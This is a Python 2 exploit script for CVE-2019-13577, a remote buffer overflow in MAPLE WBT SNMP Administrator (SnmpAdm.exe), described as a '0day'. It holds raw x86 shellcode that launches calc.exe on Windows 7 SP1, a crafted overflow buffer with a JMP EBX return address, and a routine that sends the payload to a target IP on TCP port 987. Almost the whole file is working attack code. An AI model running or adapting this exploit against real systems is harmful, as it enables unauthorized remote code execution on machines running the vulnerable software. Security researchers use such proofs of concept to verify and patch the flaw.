CVE-2019-13577.py

from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack("<L", 0x10008fb3)      #JMP EBX
popebx = struct.pack("<L", 0x022C0012)   #5B POP EBX

buf0="B"*693704 
buf1=eip
buf2=popebx+sc+"R"*899+"W"*23975 
payload=buf0+buf1+buf2

def doit(IP,payload):
    try:
        s=socket(AF_INET, SOCK_STREAM)        
        s.connect((IP, 987))
        s.send(payload)
        print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
        print "hyp3rlinx"
        s.close()
    except Exception as e:
        print str(e)

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
    return parser.parse_args()

def main(args):
    doit(args.ipaddress,payload)


if __name__ == "__main__":
    if not len(sys.argv) > 1:
        print "[*] No args supplied see Help -h"
        exit()
    main(parse_args())